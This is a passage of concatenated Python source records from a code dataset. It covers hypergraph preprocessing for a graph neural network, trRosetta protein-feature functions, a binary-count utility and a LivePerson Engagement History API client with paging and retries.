trianry edage number\", len(one_graph_adjacent_list[1]))\n # print(\"---\")\n #\n #print(len(all_graphs_adjacent_list))\n #print(all_graphs_adjacent_list)\n\n return uniformedGraphNodeIDList,uniformedGraphArgumentIDList,all_graphs_adjacent_list,argumentScoreList,sum(nodeNumberList)\n\n\n\n\n\n\n\n def getGNNInputs(self):\n self.getFinalGraphInfoList()\n totalGraphNodeIDList=[]\n totalGraphArgumentIDList = []\n argumentScoreList=[]\n for graphInfo, args in zip(self.finalGraphInfoList, self.parsedArgumentList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n tempArgList=[]\n for arg in args:\n tempArgList.append(arg.nodeUniqueIDInGraph)\n argumentScoreList.append(int(arg.score))\n totalGraphArgumentIDList.append(tempArgList)\n\n nodeNumberList=[]\n argumentNumberList=[]\n for graphNodeIDList,graphArgumentIDList in zip(totalGraphNodeIDList,totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n\n totalGraphNodeIDList=np.concatenate(totalGraphNodeIDList).ravel().tolist()#flatten\n uniformedTotalGraphNodeIDList=list(range(0, len(totalGraphNodeIDList)))\n uniformedTotalGraphArgumentIDList=[]\n counter=0\n for args, graphOffset in zip(totalGraphArgumentIDList,nodeNumberList):\n for arg in args:\n uniformedTotalGraphArgumentIDList.append(arg+counter)\n counter=counter+graphOffset\n\n # print(\"totalGraphNodeIDList\",totalGraphNodeIDList)\n # print(\"totalGraphArgumentIDList\", totalGraphArgumentIDList)\n # print(\"uniformedTotalGraphNodeIDList\",uniformedTotalGraphNodeIDList)\n # print(\"uniformedTotalGraphArgumentIDList\",uniformedTotalGraphArgumentIDList)\n # print(\"nodeNumberList\",nodeNumberList)\n # print(\"argumentNumberList\", argumentNumberList)\n\n # get node_to_graph_map from nodeNumberList\n node_to_graph_map_tensor = []\n node_to_graph_map_list=[]\n for i, nodeNumber in enumerate(nodeNumberList):\n node_to_graph_map_tensor.append(tf.fill(dims=(nodeNumber,), value=i))\n node_to_graph_map_list.append([i]*nodeNumber)\n node_to_graph_map_tensor = tf.concat(node_to_graph_map_tensor, 0)\n node_to_graph_map_list=np.concatenate(node_to_graph_map_list).ravel().tolist()#flatten\n #print(\"node_to_graph_map_list\", node_to_graph_map_list)\n #print(\"node_to_graph_map_tensor\",node_to_graph_map_tensor)\n\n # get adjacent_list\n edgeTypeList={}\n edgeTypeNumberDict={}\n edgeTypeNumberList={}\n adjacent_list=[]\n maxNodeForAHypedEdge=10\n for i in range(2,maxNodeForAHypedEdge):\n edgeTypeList[str(i)]=list()\n edgeTypeNumberDict[str(i)] = [0]*len(self.finalGraphInfoList)\n for j,graphInfo in enumerate(self.finalGraphInfoList):\n #print('numberOfUniqueNodeID',graphInfo.numberOfUniqueNodeID)\n #map local node ID to uniformed node ID\n offset=sum(nodeNumberList[:j])\n local_node_ID_to_uniformed_node_ID=list(range(offset,offset+graphInfo.numberOfUniqueNodeID))\n #print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j]=len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([local_node_ID_to_uniformed_node_ID[edge['sender']],local_node_ID_to_uniformed_node_ID[edge['receiver']]])\n #print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n localNodeIDList=[hyperedge['senderIDList'],hyperedge['receiverIDList']]\n localNodeIDList = np.concatenate(localNodeIDList).ravel().tolist()\n uniformedNodeIDList=[]\n for localID in localNodeIDList:\n uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2,maxNodeForAHypedEdge):\n if(len(uniformedNodeIDList)==i):\n edgeTypeList[str(i)].append(uniformedNodeIDList)\n edgeTypeNumberDict[str(i)][j]=edgeTypeNumberDict[str(i)][j]+1\n\n\n #eleminate empty edge type\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)])!=0:\n adjacent_list.append(tf.constant(edgeTypeList[typeKey],dtype=tf.int32))\n edgeTypeNumberList[typeKey]=edgeTypeNumberDict[typeKey]\n print(edgeTypeNumberList)\n #print edge types\n # for i,edges in enumerate(adjacent_list):\n # print(f\"edge type {i}\",edges)\n\n\n return tf.constant(uniformedTotalGraphNodeIDList),\\\n tuple(adjacent_list),node_to_graph_map_tensor,nodeNumberList,argumentNumberList,sum(nodeNumberList),\\\n tf.constant(uniformedTotalGraphArgumentIDList),argumentScoreList,edgeTypeNumberList\n\n\n def printFinalGraphInfo(self):\n for graphInfo,args in zip(self.finalGraphInfoList,self.parsedArgumentList):\n graphInfo.printInfo()\n for arg in args:\n arg.printArgs()\n\n def edgeIntegerEncoding(self):\n #not include edge which connect to hyperedge\n #edge normalization\n edgeClassList=[]\n for G in self.graphList:\n for edge in G.edges:\n edgeClassList.append(G.edges[edge]['label'])\n\n edgeClassList=list(set(edgeClassList))\n\n edgeCounterDict = {}\n for c in edgeClassList:\n edgeCounterDict[c] = 0\n\n for G in self.graphList:\n for edge in G.edges:\n edgeClassName=G.edges[edge]['label']\n G.edges[edge]['edgeNormalizedName']=edgeClassName.replace('\"','')+str(edgeCounterDict[edgeClassName])\n edgeCounterDict[edgeClassName]=edgeCounterDict[edgeClassName]+1\n for c in edgeCounterDict:\n edgeCounterDict[c] = 0\n\n #encode edge to integer\n #get vocabulary\n edgeVocaList = []\n for G in self.graphList:\n for edge in G.edges:\n edgeVocaList.append(G.edges[edge]['edgeNormalizedName'])\n edgeVocaList = list(set(edgeVocaList))\n\n edgeVocaIntegerEncoding = []\n for i, v in enumerate(edgeVocaList):\n edgeVocaIntegerEncoding.append(i)\n\n for G in self.graphList:\n for edge in G.edges:\n for t, i in zip(edgeVocaList, edgeVocaIntegerEncoding):\n if(G.edges[edge]['edgeNormalizedName']==t):\n G.edges[edge]['edgeLabelUniqueID']=i\n\n\n\n\n def hyperedgeIntegerEncoding(self):\n\n #encoding hyperedge to unique Integer ID\n #normalize hyoeredge names\n nodeCounterDict = {}\n nodeCounterDict['DataFlowHyperedge'] = 0\n nodeCounterDict['controlFlowHyperEdge'] = 0\n\n for G in self.graphList:\n for node in G.nodes:\n className=G.nodes[node]['class']\n if(className==\"DataFlowHyperedge\"):\n G.nodes[node]['hyperedgeNormalizedName'] = className + str(nodeCounterDict[className])\n nodeCounterDict['DataFlowHyperedge'] =nodeCounterDict['DataFlowHyperedge'] +1\n if (className == \"controlFlowHyperEdge\"):\n G.nodes[node]['hyperedgeNormalizedName'] = className + str(nodeCounterDict[className])\n nodeCounterDict['controlFlowHyperEdge'] = nodeCounterDict['controlFlowHyperEdge'] + 1\n nodeCounterDict['DataFlowHyperedge'] = 0\n nodeCounterDict['controlFlowHyperEdge'] = 0\n\n\n #encode hyperedge to unique ID\n hyperedgeVocaList=[]\n for G in self.graphList:\n for node in G.nodes:\n if G.nodes[node]['class'] == \"DataFlowHyperedge\":\n hyperedgeVocaList.append(G.nodes[node]['hyperedgeNormalizedName'])\n if G.nodes[node]['class'] == \"controlFlowHyperEdge\":\n hyperedgeVocaList.append(G.nodes[node]['hyperedgeNormalizedName'])\n hyperedgeVocaList = list(set(hyperedgeVocaList))\n #print(hyperedgeVocaList)\n # integer encoding\n hyperedgeVocaIntegerEncoding = []\n for i, v in enumerate(hyperedgeVocaList):\n hyperedgeVocaIntegerEncoding.append(i)\n for G in self.graphList:\n for node in G.nodes:\n for t, i in zip(hyperedgeVocaList, hyperedgeVocaIntegerEncoding):\n if(G.nodes[node]['class'] == \"DataFlowHyperedge\" and G.nodes[node]['hyperedgeNormalizedName']==t):\n G.nodes[node]['hyperedgeLabelUniqueID']=i\n if (G.nodes[node]['class'] == \"controlFlowHyperEdge\" and G.nodes[node]['hyperedgeNormalizedName'] == t):\n G.nodes[node]['hyperedgeLabelUniqueID'] = i\n\n\n\n def normalizeNodeLabel(self):\n vocabList=[]\n for G in self.graphList:\n\n nodeList=[]\n for node in G.nodes:\n nodeList.append(G.nodes[node]['class'])\n nodeClassList=list(set(nodeList))\n #print(nodeClassList)\n nodeClassList.remove('DataFlowHyperedge')\n nodeClassList.remove('controlFlowHyperEdge')\n #print(nodeClassList)\n\n nodeCounterDict={}\n for c in nodeClassList:\n nodeCounterDict[c]=0\n #print(nodeCounterDict)\n\n operatorList=[]\n for node in G.nodes:\n if G.nodes[node]['class']==\"Operator\":\n #print(G.nodes[node]['label'])\n operatorList.append(G.nodes[node]['label'])\n G.nodes[node]['normalizedName']=G.nodes[node]['label']\n if G.nodes[node]['class']!=\"Operator\" and G.nodes[node]['class']!=\"DataFlowHyperedge\" and G.nodes[node]['class']!=\"controlFlowHyperEdge\":\n className=G.nodes[node]['class']\n G.nodes[node]['normalizedName']=className+str(nodeCounterDict[className])\n nodeCounterDict[className] = nodeCounterDict[className]+1\n #print(G.nodes[node]['normalizedName'])\n operatorList=list(set(operatorList))\n\n\n for node in G.nodes:\n if G.nodes[node]['class'] != \"DataFlowHyperedge\" and G.nodes[node][\n 'class'] != \"controlFlowHyperEdge\":\n vocabList.append(G.nodes[node]['normalizedName'])\n self.vocabList = list(set(vocabList))\n\n\n\n def encodeNodeLabelToInteger(self):\n # integer encoding\n vocavIntegerEncoding = []\n for i, v in enumerate(self.vocabList):\n vocavIntegerEncoding.append(i)\n for G in self.graphList:\n for node in G.nodes:\n for t, i in zip(self.vocabList, vocavIntegerEncoding):\n if(G.nodes[node]['class'] != \"DataFlowHyperedge\" and G.nodes[node]['class'] != \"controlFlowHyperEdge\" and G.nodes[node]['normalizedName']==t):\n G.nodes[node]['nodeLabelUniqueID']=i\n\n\n\n def giveNodeUniqueID(self):\n for G in self.graphList:\n nodeCounter=0\n for node in G.nodes:\n nodeDirc=G.nodes[node]\n if(nodeDirc['class']!=\"DataFlowHyperedge\" and nodeDirc['class']!=\"controlFlowHyperEdge\"):\n G.nodes[node]['nodeUniqueID'] = nodeCounter\n nodeCounter=nodeCounter+1\n\n\n def giveHyperedgeUniqueID(self):\n for G in self.graphList:\n nodeCounter=0\n for node in G.nodes:\n if(G.nodes[node]['class']==\"DataFlowHyperedge\" or G.nodes[node]['class']==\"controlFlowHyperEdge\" ):\n G.nodes[node]['hyperedgeUniqueID'] = nodeCounter\n nodeCounter=nodeCounter+1\n\n\n def giveEdgeUniqueID(self):\n for G in self.graphList:\n edgeCounter=0\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]][\n 'class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]][\n 'class'] != \"controlFlowHyperEdge\"):\n G.edges[edge]['edgeUniqueID'] = edgeCounter\n edgeCounter=edgeCounter+1\n\n def get_unique_ID_for_all_nodes_and_edges(self):\n for G in self.graphList:\n nodeCounter=0\n hyperedgeCounter = 0\n for node in G.nodes:\n nodeDirc=G.nodes[node]\n if(nodeDirc['class']!=\"DataFlowHyperedge\" and nodeDirc['class']!=\"controlFlowHyperEdge\"):#node\n G.nodes[node]['nodeUniqueID'] = nodeCounter\n nodeCounter=nodeCounter+1\n if (G.nodes[node]['class'] == \"DataFlowHyperedge\" or G.nodes[node]['class'] == \"controlFlowHyperEdge\"):#hyperedge\n G.nodes[node]['hyperedgeUniqueID'] = hyperedgeCounter\n hyperedgeCounter = hyperedgeCounter + 1\n edgeCounter = 0\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]][\n 'class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]][\n 'class'] != \"controlFlowHyperEdge\"):#normal edges\n G.edges[edge]['edgeUniqueID'] = edgeCounter\n edgeCounter = edgeCounter + 1\n\n\n\n def printNodeInfo(self):\n #print node information\n for G in self.graphList:\n for node in G.nodes:\n if(G.nodes[node]['class']==\"DataFlowHyperedge\" or G.nodes[node]['class']==\"controlFlowHyperEdge\" ):\n print(\"hyperedge\",G.nodes[node])\n else:\n print(\"node:\",G.nodes[node])\n\n def printEdgeInfo(self):\n for G in self.graphList:\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]][\n 'class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]][\n 'class'] != \"controlFlowHyperEdge\"):\n print(\"edge:\",G.edges[edge],edge)\n else:\n print(\"partial hyperedge:\", G.edges[edge],edge)\n\n\n def addSenderReceiverInfoToHyperedge(self):\n\n # replace connected node name with node unique ID in hyperedges\n for G in self.graphList:\n for node in G.nodes:\n if (G.nodes[node]['class']==\"DataFlowHyperedge\" or G.nodes[node]['class']==\"controlFlowHyperEdge\"):\n fromList = []\n toList = []\n #fromNodeList=[]\n #toNodeList=[]\n for pre in G.predecessors(node):\n fromList.append(G.nodes[pre]['nodeUniqueID'])\n #fromNodeList.append(G.nodes[pre]['nodeName'])\n for suc in G.successors(node):\n toList.append(G.nodes[suc]['nodeUniqueID'])\n #toNodeList.append(G.nodes[suc]['nodeName'])\n G.nodes[node]['from'] = fromList\n G.nodes[node]['to'] = toList\n G.nodes[node]['Hyperedgeconection'] = fromList + toList\n # todo:include connected normal edge info. no need to do this? because these edges are part of hyperedge and has no Iedge D\n # for fromNode in fromNodeList:\n # print(G.edges[(fromNode, node)])\n # G.nodes[node]['inComingEdge']=G.edges[(fromNode,node)]['edgeUniqueID']\n # G.nodes[node]['outComingEdge'] = G.edges[(node, toNodeList[0])]['edgeUniqueID']\n\n\n def addSenderReceiverInfoToEdge(self):\n # replace connected node name with node unique ID in edges\n for G in self.graphList:\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]]['class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]]['class'] != \"controlFlowHyperEdge\"):\n fromNode = G.nodes[edge[0]]['nodeUniqueID']\n toNode = G.nodes[edge[1]]['nodeUniqueID']\n G.edges[edge]['from'] = fromNode\n G.edges[edge]['to'] = toNode\n G.edges[edge]['edgeConection'] = [fromNode,toNode]\n elif(\"Hyperedge\" in G.nodes[edge[0]]['class']):\n G.edges[edge]['connectedHyperedge'] = G.nodes[edge[0]]['hyperedgeUniqueID']\n elif(\"Hyperedge\" in G.nodes[edge[1]]['class']):\n G.edges[edge]['connectedHyperedge'] = G.nodes[edge[1]]['hyperedgeUniqueID']\n\n\n\n\n def readGraphsFromDot(self):\n path = self._path+self._data_fold+\"/\"\n if self._file_type==\".smt2\":\n self.read_graph(path, suffix=\".smt2\")\n if self._file_type == \".c\":\n self.read_graph(path, suffix=\".c\")\n\n\n\n def read_graph(self,path,suffix):\n if self._split_flag==0:\n print(\"read\",suffix,\"files\")\n number_of_graphs=len(glob.glob(path + '*' + suffix + '.gv'))\n print(\"graph file\", number_of_graphs)\n print(\"argument file\", len(glob.glob(path + '*' + suffix + '.arguments')))\n gv_list=sorted(glob.glob(path + '*' + suffix + '.gv'))\n argument_list=sorted(glob.glob(path + '*' + suffix + '.arguments'))\n start=time.time()\n for fileGraph, fileArgument in zip(gv_list,\n argument_list):\n fileName = fileGraph[:fileGraph.find(suffix + \".gv\") + len(suffix)]\n fileName = fileName[fileName.rindex(\"/\") + 1:]\n print(fileName)\n # read graph\n print(fileGraph)\n #hornGraph = Source.from_file(fileGraph)\n G = nx.DiGraph(nx.drawing.nx_pydot.read_dot(fileGraph))\n self.graphList.append(G)\n\n # read argument\n print(fileArgument)\n f = open(fileArgument, \"r\")\n arguments = f.read()\n f.close()\n self.argumentList.append(arguments)\n print(\"nx.DiGraph time:\", time.time() - start)\n else:\n print(\"read\", suffix, \"files\")\n number_of_graphs = len(glob.glob(path + '*' + suffix + '.gv'))\n print(\"total graph file\", number_of_graphs)\n print(\"total argument file\", len(glob.glob(path + '*' + suffix + '.arguments')))\n gv_list = sorted(glob.glob(path + '*' + suffix + '.gv'))\n argument_list = sorted(glob.glob(path + '*' + suffix + '.arguments'))\n buket_size=math.ceil(len(gv_list)/self._buckets)\n if self._split_flag id_min\n\t\tw = 1.0/tf.reduce_sum(tf.cast(id_mask, dtype=tf.float32),-1)\n\treturn w\n\n# shrunk covariance inversion\ndef fast_dca(msa1hot, weights, penalty = 4.5):\n\n\tnr = tf.shape(msa1hot)[0]\n\tnc = tf.shape(msa1hot)[1]\n\tns = tf.shape(msa1hot)[2]\n\n\twith tf.name_scope('covariance'):\n\t\tx = tf.reshape(msa1hot, (nr, nc * ns))\n\t\tnum_points = tf.reduce_sum(weights) - tf.sqrt(tf.reduce_mean(weights))\n\t\tmean = tf.reduce_sum(x * weights[:,None], axis=0, keepdims=True) / num_points\n\t\tx = (x - mean) * tf.sqrt(weights[:,None])\n\t\tcov = tf.matmul(tf.transpose(x), x)/num_points\n\n\twith tf.name_scope('inv_convariance'):\n\t\tcov_reg = cov + tf.eye(nc * ns) * penalty / tf.sqrt(tf.reduce_sum(weights))\n\t\tinv_cov = tf.linalg.inv(cov_reg)\n\t\t\n\t\tx1 = tf.reshape(inv_cov,(nc, ns, nc, ns))\n\t\tx2 = tf.transpose(x1, [0,2,1,3])\n\t\tfeatures = tf.reshape(x2, (nc, nc, ns * ns))\n\t\t\n\t\tx3 = tf.sqrt(tf.reduce_sum(tf.square(x1[:,:-1,:,:-1]),(1,3))) * (1-tf.eye(nc))\n\t\tapc = tf.reduce_sum(x3,0,keepdims=True) * tf.reduce_sum(x3,1,keepdims=True) / tf.reduce_sum(x3)\n\t\tcontacts = (x3 - apc) * (1-tf.eye(nc))\n\n\treturn tf.concat([features, contacts[:,:,None]], axis=2)\n\ndef keras_collect_features(inputs, wmin=0.8) :\n\tf1d_seq_batched, msa1hot_batched = inputs\n\n\tf1d_seq = f1d_seq_batched[0, ...]\n\tmsa1hot = msa1hot_batched[0, ...]\n\n\tnrow = K.shape(msa1hot)[0]\n\tncol = K.shape(msa1hot)[1]\n\n\tw = reweight(msa1hot, wmin)\n\n\t# 1D features\n\tf1d_pssm = msa2pssm(msa1hot, w)\n\n\tf1d = tf.concat(values=[f1d_seq, f1d_pssm], axis=1)\n\tf1d = tf.expand_dims(f1d, axis=0)\n\tf1d = tf.reshape(f1d, [1,ncol,42])\n\n\t# 2D features\n\tf2d_dca = tf.cond(nrow>1, lambda: fast_dca(msa1hot, w), lambda: tf.zeros([ncol,ncol,442], tf.float32))\n\tf2d_dca = tf.expand_dims(f2d_dca, axis=0)\n\n\tf2d = tf.concat([tf.tile(f1d[:,:,None,:], [1,1,ncol,1]), \n\t\t\t\t\ttf.tile(f1d[:,None,:,:], [1,ncol,1,1]),\n\t\t\t\t\tf2d_dca], axis=-1)\n\tf2d = tf.reshape(f2d, [1,ncol,ncol,442+2*42])\n\n\treturn f2d\n\n#trRosetta Saved Model definition\n\ndef pssm_func(inputs, diag=0.0):\n\tx,y = inputs\n\t_,_,L,A = [tf.shape(y)[k] for k in range(4)]\n\twith tf.name_scope('1d_features'):\n\t\t# sequence\n\t\tx_i = x[0,:,:20]\n\t\t# pssm\n\t\tf_i = y[0,0, :, :]\n\t\t# entropy\n\t\th_i = tf.zeros((L,1))\n\t\t#h_i = K.sum(-f_i * K.log(f_i + 1e-8), axis=-1, keepdims=True)\n\t\t# tile and combined 1D features\n\t\tfeat_1D = tf.concat([x_i,f_i,h_i], axis=-1)\n\t\tfeat_1D_tile_A = tf.tile(feat_1D[:,None,:], [1,L,1])\n\t\tfeat_1D_tile_B = tf.tile(feat_1D[None,:,:], [L,1,1])\n\n\twith tf.name_scope('2d_features'):\n\t\tic = diag * tf.eye(L*A)\n\t\tic = tf.reshape(ic,(L,A,L,A))\n\t\tic = tf.transpose(ic,(0,2,1,3))\n\t\tic = tf.reshape(ic,(L,L,A*A))\n\t\ti0 = tf.zeros([L,L,1])\n\t\tfeat_2D = tf.concat([ic,i0], axis=-1)\n\n\t\tfeat = tf.concat([feat_1D_tile_A, feat_1D_tile_B, feat_2D],axis=-1)\n\t\treturn tf.reshape(feat, [1,L,L,442+2*42])\n\ndef load_saved_predictor(model_path, msa_one_hot=None) :\n\t\n\tsaved_model = load_model(model_path, custom_objects = {\n\t\t'InstanceNormalization' : InstanceNormalization,\n\t\t'reweight' : reweight,\n\t\t'wmin' : 0.8,\n\t\t'msa2pssm' : msa2pssm,\n\t\t'tf' : tf,\n\t\t'fast_dca' : fast_dca,\n\t\t'keras_collect_features' : pssm_func#keras_collect_features\n\t})\n\t#print(saved_model.summary())\n\n\tdef _initialize_predictor_weights(predictor_model, saved_model=saved_model, model_path=model_path) :\n\t\t#Load pre-trained model\n\t\t#print(saved_model.summary())\n\t\t#predictor_model.load_weights(model_path, by_name=True)\n\t\tprint(\"No weights copied.\")\n\n\tdef _load_predictor_func(sequence_input, saved_model=saved_model) :\n\t\t\n\t\tmsa_one_hot_var = Lambda(lambda x: K.concatenate([K.expand_dims(x, axis=1), K.zeros((K.shape(x)[0], 1, K.shape(x)[1], 1, 1))], axis=-2))(sequence_input)\n\t\t\n\t\tp_dist, p_theta, p_phi, p_omega = Lambda(lambda x: saved_model([x[0][..., 0], x[1][..., 0]]))([sequence_input, msa_one_hot_var])#saved_model([sequence_input, msa_one_hot_var])\n\n\t\tp_dist_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. - K.epsilon()))(p_dist)\n\t\tp_theta_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. - K.epsilon()))(p_theta)\n\t\tp_phi_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. - K.epsilon()))(p_phi)\n\t\tp_omega_clipped = Lambda(lambda x: K.clip(x, K.epsilon(), 1. - K.epsilon()))(p_omega)\n\t\t\n\t\tpredictor_inputs = []\n\t\tpredictor_outputs = [p_dist_clipped, p_theta_clipped, p_phi_clipped, p_omega_clipped]\n\n\t\treturn predictor_inputs, predictor_outputs, _initialize_predictor_weights\n\n\treturn _load_predictor_func\n","sub_path":"analysis/rosetta/trrosetta_single_model_no_msa_batched_simpler_1d_features_2.py","file_name":"trrosetta_single_model_no_msa_batched_simpler_1d_features_2.py","file_ext":"py","file_size_in_byte":8753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156397622","text":"#coding:utf-8\n__all__ = ['count_binary']\n\nfrom score_card_model.utils.check import check_array_binary\n\n\ndef count_binary(a, event=1):\n if not check_array_binary(a):\n raise AttributeError(\"array must be a binary array\")\n try:\n event_count = (a == event).sum()\n except AttributeError as ae:\n raise AttributeError(\"need a event\")\n non_event_count = a.shape[-1] - event_count\n return event_count, non_event_count\n","sub_path":"ScoreCardModel/utils/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140068945","text":"import concurrent.futures\nimport math\nimport re\nimport time\nfrom lp_api_wrapper.parsers import Engagements\nfrom lp_api_wrapper.util.wrapper_base import WrapperBase, APIMethod\n\n\nclass EngagementHistory(WrapperBase):\n \"\"\"\n Python Wrapper for the LivePerson Engagement History API\n\n Documentation:\n https://developers.liveperson.com/data-engagement-history-methods.html\n \"\"\"\n\n def __init__(self, auth, company=None, source=\"LPApiWrapper\", max_retry=3, wait_factor=15):\n\n super().__init__(auth=auth)\n\n # Establish Base URL\n domain = self.get_domain(\n account_id=auth.account_id, service_name='engHistDomain')\n self.base_url = f'https://{domain}/interaction_history/api/account/{auth.account_id}'\n self.company = company\n self.source = source\n self.max_retry = max_retry\n self.wait_factor = wait_factor\n\n def engagements(self, body, offset=0, limit=100, sort=None):\n \"\"\"\n Documentation:\n https://developers.liveperson.com/data_api-engagement-history-methods.html\n\n * Returns a single offset of data within start time range *\n\n :param body: dict \n :param offset: int\n :param limit: int\n :param sort: str\n :return Decoded JSON data\n \"\"\"\n attempt = 0\n while attempt < self.max_retry:\n # set wait time\n wait_time = attempt * self.wait_factor\n # wait\n time.sleep(wait_time)\n # increment attempt\n attempt += 1 \n try:\n url = f'{self.base_url}/interactions/search'\n params = {\n 'offset': offset,\n 'limit': limit,\n 'sort': sort,\n 'company': self.company,\n 'source': self.source \n }\n api_result = self.process_request(\n method=APIMethod.POST,\n url=url,\n url_parameters=params,\n body=body\n )\n break\n except Exception:\n api_result = None\n print(\n f'[EHAPI Fail]: attempt={attempt}of{self.max_retry} url={url} params={params} body={body}')\n return api_result\n\n def all_engagements(self, body, max_workers=7, debug=0, parse_data=False, offset=0, max_limit=None):\n \"\"\"\n Documentation:\n https://developers.liveperson.com/data_api-engagement-history-methods.html\n\n * Returns all offsets of data within start time range *\n\n :param body: dict \n :param max_workers: int (Max # of concurrent requests)\n :param debug: int (Status of API requests: 1=full, 2=summary, default=0)\n :param parse_data: bool (Returns a parsed Engagements data object.)\n :param offset: Start offset\n :param max_limit: Max conversations to retrieve. Default -1, is all conversations based on the body\n :return List of interaction history records as decoded JSON data\n \"\"\"\n\n # Grab first offset of data.\n initial_data = self.engagements(body=body, offset=0)\n\n # Number of conversations in date range that was selected in the body start parameters.\n count = initial_data['_metadata']['count']\n\n # Retrieve site ID from URL\n lesite = re.search('account/(.*)', self.base_url)\n lesite = lesite.group(1)\n\n # Max number of retrivals per call\n limit = 100\n offset_start = offset\n # Total number of conversation to actually retrieve\n if (max_limit is None):\n total_conversation = count - offset\n last_conversation = count\n else:\n if (count > max_limit + offset):\n total_conversation = max_limit\n last_conversation = max_limit + offset\n else:\n total_conversation = count - offset\n last_conversation = count\n\n # If there are no conversations in data range, return nothing.\n if count == 0:\n if debug == 1:\n print('[EHAPI Status]: There are 0 records!')\n return None\n else:\n if debug >= 1:\n print(\n f'[EHAPI Summary]: count={total_conversation} reqs={math.ceil(total_conversation/limit)} workers={max_workers} leSite={lesite}')\n\n # Set up delivery options.\n engagements = Engagements() if parse_data else []\n\n # Multi-threading to handle multiple requests at a time.\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n\n # Create all future requests for the rest of the offsets in the body's data range.\n future_requests = {}\n last_call = False\n while (not last_call):\n if (offset_start + limit >= last_conversation):\n limit = last_conversation - offset_start\n future_requests[executor.submit(\n self.engagements, body, offset_start, limit)] = offset_start\n last_call = True\n else:\n future_requests[executor.submit(\n self.engagements, body, offset_start, limit)] = offset_start\n offset_start = offset_start + limit\n\n for future in concurrent.futures.as_completed(future_requests):\n\n if debug == 1:\n print(\n f'[EHAPI Offset Status]: {future_requests[future] - offset} of {total_conversation} records completed!')\n\n # Grab dict with 'interactionHistoryRecords' from the request. Removing any '_metadata' info.\n records = future.result()['interactionHistoryRecords']\n\n # Store results\n if parse_data:\n engagements.append_records(\n records=[record for record in records])\n else:\n engagements.extend([record for record in records])\n\n return engagements\n\n def all_engagements_by_chunks(self, body, max_workers=7, debug=0, parse_data=False):\n \"\"\"\n Documentation:\n https://developers.liveperson.com/data_api-messaging-interactions-conversations.html\n\n * Returns all offsets of data within start time range *\n\n :param body: dict \n :param max_workers: int (Max # of concurrent requests)\n :param debug: int (Status of API requests: 1=full, 2=summary, default=0)\n :param parse_data: bool (Returns a parsed Engagements data object.)\n :return List of conversations history records as decoded JSON data\n \"\"\"\n\n # Grab first offset of data.\n initial_data = self.engagements(body=body, offset=0)\n\n # Number of conversations in date range that was selected in the body start parameters.\n count = initial_data['_metadata']['count']\n\n # Retrieve site ID from URL\n lesite = re.search('account/(.*)', self.base_url)\n lesite = lesite.group(1)\n\n # Max number of retrivals per call\n limit_per_call = 100\n\n # If there are no conversations in data range, return nothing.\n if count == 0:\n if debug == 1:\n print('[EHAPI Status]: There are 0 records!')\n return None\n else:\n if debug >= 1:\n print(\n f'[EHAPI Summary]: count={count} reqs={math.ceil(count/limit_per_call)} workers={max_workers} leSite={lesite}')\n chunk_size = 500 # MUST be greater than the limit_per_call\n chunk_offset = 0\n offset = 0\n chunks = math.ceil(count/chunk_size)\n\n # E.g Count =468, chunk_size =150 then chunks 4\n # Will iterate 4 times\n for iterat in range(1, chunks + 1):\n engagements = Engagements() if parse_data else []\n future_requests = {}\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n\n # First iteration: chunk_offset =0 , chunk_offset + chunk_size = 150 , limit_per_call=100, list_offset = [0,100]\n # Second iteration: chunk_offset =150 , chunk_offset + chunk_size = 300 , limit_per_call=100, list_offset = [150,250]\n # Fourth iteration: list_offset = [450,600]\n list_offset = range(\n chunk_offset, chunk_offset + chunk_size, limit_per_call)\n for elem in list_offset:\n if(elem < count): # If the element is greater than the total count, we dont need to make a call starting with that offset. Fourth iteration 600>468\n # For second iteration, second element: 250 + 100 > 150 + 150; For fourth iteration, second element: won't pass previous if\n if (elem + limit_per_call > chunk_offset + chunk_size):\n limit_per_call = chunk_size - limit_per_call # 150 - 100 = 50\n future_requests[executor.submit(\n self.engagements, body, offset, limit_per_call)] = offset\n offset = offset + limit_per_call\n\n for future in concurrent.futures.as_completed(future_requests):\n\n if debug == 1:\n print(\n f'[EHAPI Offset Status]: {future_requests[future]} of {count} records completed!')\n\n # Grab dict with 'conversationHistoryRecords' from the request. Removing any '_metadata' info.\n records = future.result()['interactionHistoryRecords']\n\n # Store results.\n if parse_data:\n engagements.append_records(\n records=[record for record in records])\n else:\n engagements.extend([record for record in records])\n\n limit_per_call = 100\n chunk_offset = chunk_offset + chunk_size\n yield 